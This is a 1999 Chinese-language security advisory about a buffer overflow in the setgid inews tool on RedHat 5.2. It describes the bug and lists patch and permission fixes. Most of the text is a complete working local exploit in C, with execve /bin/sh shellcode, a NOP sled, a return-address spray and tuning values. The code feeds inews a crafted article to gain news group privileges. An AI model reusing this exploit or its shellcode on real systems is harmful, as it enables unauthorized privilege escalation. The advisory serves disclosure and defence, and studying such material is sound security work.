安全研究

安全漏洞
inews 缓冲区溢出漏洞

发布日期:1999-10-01
更新日期:1999-10-01

受影响系统:
Linux
+RedHat 5.2
描述:
作者:warning3

inews是个检查news信件内容的工具.缺省被设置了news sgid位.
但它对含有一个很长的"From: "头的信件处理时,会发生溢出.导致
恶意用户获得news组权限,进而有可能导致获得root权限(理论上).
(好象"Sender: "头也应该会溢出,不过我没有成功)



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

这个程序只是为了检验之用,请只在自己的机器上测试!

/* Local exploit for inews-1.7.2 .
* It will give you "news" egid.
* Tested on RedHat 5.2  
*
* Usage: $ gcc -o inv inv.c
*        $ ./inv <buffsize> <offset> <align>
*        Using address : 0xbffff890
*        bash$ id
*        uid=503(warning3) gid=504(warning3) egid=13(news) groups=504(warning3)
* If it don't work,try to change buffsize/offset/align .
* ( buffsize=800-950, offset=1200-1300, align=2 worked on my Redhat 5.2 )  
*
* WARNING:
*   This code is for educational purpose only and should not be run in
*   any host without permission from the system administrator.
*                                      warning3@hotmail.com
*                                            1999/09
*/
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define DEFAULT_OFFSET                1300
#define DEFAULT_BUFFER_SIZE           800
#define NOP                      0x90
#define article                         "hacknews"

char news[]="\nSubject: hacked\nNewsgroups: no.this.group\n\n";

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[]) {

  char *buff, *ptr;
  long addr,*addr_ptr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int align=2,i,fd;

   if (argc > 1) bsize=atoi(argv[1]);
   if (argc > 2) offset=atoi(argv[2]);
   if (argc > 3) align=atoi(argv[3]);

   if(!(buff = malloc(bsize))) {
      printf("can't allocate memory\n");
      exit(0);
   }
   addr = get_sp() - offset;
   printf("Using address : 0x%x\n",addr);
   ptr = buff;
   addr_ptr=(long *)(ptr+align);
   for (i = align; i < bsize; i += 4)
            *(addr_ptr++) = addr;
   for (i = align; i < (bsize/2); i++)
             buff[i] = NOP;
   ptr=buff + (bsize/2) - strlen(shellcode)/2;
   memcpy(ptr,shellcode,strlen(shellcode));
   memcpy(buff,"From: ",6);
   memcpy(buff+bsize-strlen(news)-1,news,strlen(news));
   buff[bsize-1]='\0';
   fd = open(article, O_RDWR|O_CREAT|O_TRUNC, 0600);
   write (fd, buff, strlen(buff));
   close(fd);
   execl("/usr/bin/inews","inews","-h", article,NULL);
        
}



建议:
(1) chmod 0550 /usr/bin/inews
(2)  到RedHat网站上下载新的inn2.2.1 RPM包

Red Hat Linux 6.0:
==================
Intel:
  ftp://updates.redhat.com//6.0/i386/inn-2.2.1-1.i386.rpm
  ftp://updates.redhat.com//6.0/i386/inn-devel-2.2.1-1.i386.rpm
Alpha:
  ftp://updates.redhat.com//6.0/alpha/inn-2.2.1-1.alpha.rpm
  ftp://updates.redhat.com//6.0/alpha/inn-devel-2.2.1-1.alpha.rpm
Sparc:
  ftp://updates.redhat.com//6.0/sparc/inn-2.2.1-1.sparc.rpm
  ftp://updates.redhat.com//6.0/sparc/inn-devel-2.2.1-1.sparc.rpm
Source packages:  
  ftp://updates.redhat.com//6.0/SRPMS/inn-2.2.1-1.src.rpm

Red Hat Linux 5.2:
==================
Intel:
  ftp://updates.redhat.com//5.2/i386/inn-2.2.1-0.5.2.i386.rpm
  ftp://updates.redhat.com//5.2/i386/inn-devel-2.2.1-0.5.2.i386.rpm
Alpha:
  ftp://updates.redhat.com//5.2/alpha/inn-2.2.1-0.5.2.alpha.rpm
  ftp://updates.redhat.com//5.2/alpha/inn-devel-2.2.1-0.5.2.alpha.rpm
Sparc:
  ftp://updates.redhat.com//5.2/sparc/inn-2.2.1-0.5.2.sparc.rpm
  ftp://updates.redhat.com//5.2/sparc/inn-devel-2.2.1-0.5.2.sparc.rpm
Source packages:  
  ftp://updates.redhat.com//5.2/SRPMS/inn-2.2.1-0.5.2.src.rpm

Red Hat Linux 4.2:
==================
Intel:
  ftp://updates.redhat.com//4.2/i386/inn-2.2.1-0.4.2.i386.rpm
  ftp://updates.redhat.com//4.2/i386/inn-devel-2.2.1-0.4.2.i386.rpm
  ftp://updates.redhat.com//4.2/noarch/cleanfeed-0.95.7b-0.4.2.noarch.rpm
Alpha:
  ftp://updates.redhat.com//4.2/alpha/inn-2.2.1-0.4.2.alpha.rpm
  ftp://updates.redhat.com//4.2/alpha/inn-devel-2.2.1-0.4.2.alpha.rpm
  ftp://updates.redhat.com//4.2/noarch/cleanfeed-0.95.7b-0.4.2.noarch.rpm
Sparc:
  ftp://updates.redhat.com//4.2/sparc/inn-2.2.1-0.4.2.sparc.rpm
  ftp://updates.redhat.com//4.2/sparc/inn-devel-2.2.1-0.4.2.sparc.rpm
  ftp://updates.redhat.com//4.2/noarch/cleanfeed-0.95.7b-0.4.2.noarch.rpm
Source packages:
  ftp://updates.redhat.com//4.2/SRPMS/cleanfeed-0.95.7b-0.4.2.src.rpm
  ftp://updates.redhat.com//4.2/SRPMS/inn-2.2.1-0.4.2.src.rpm


浏览次数:8011
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障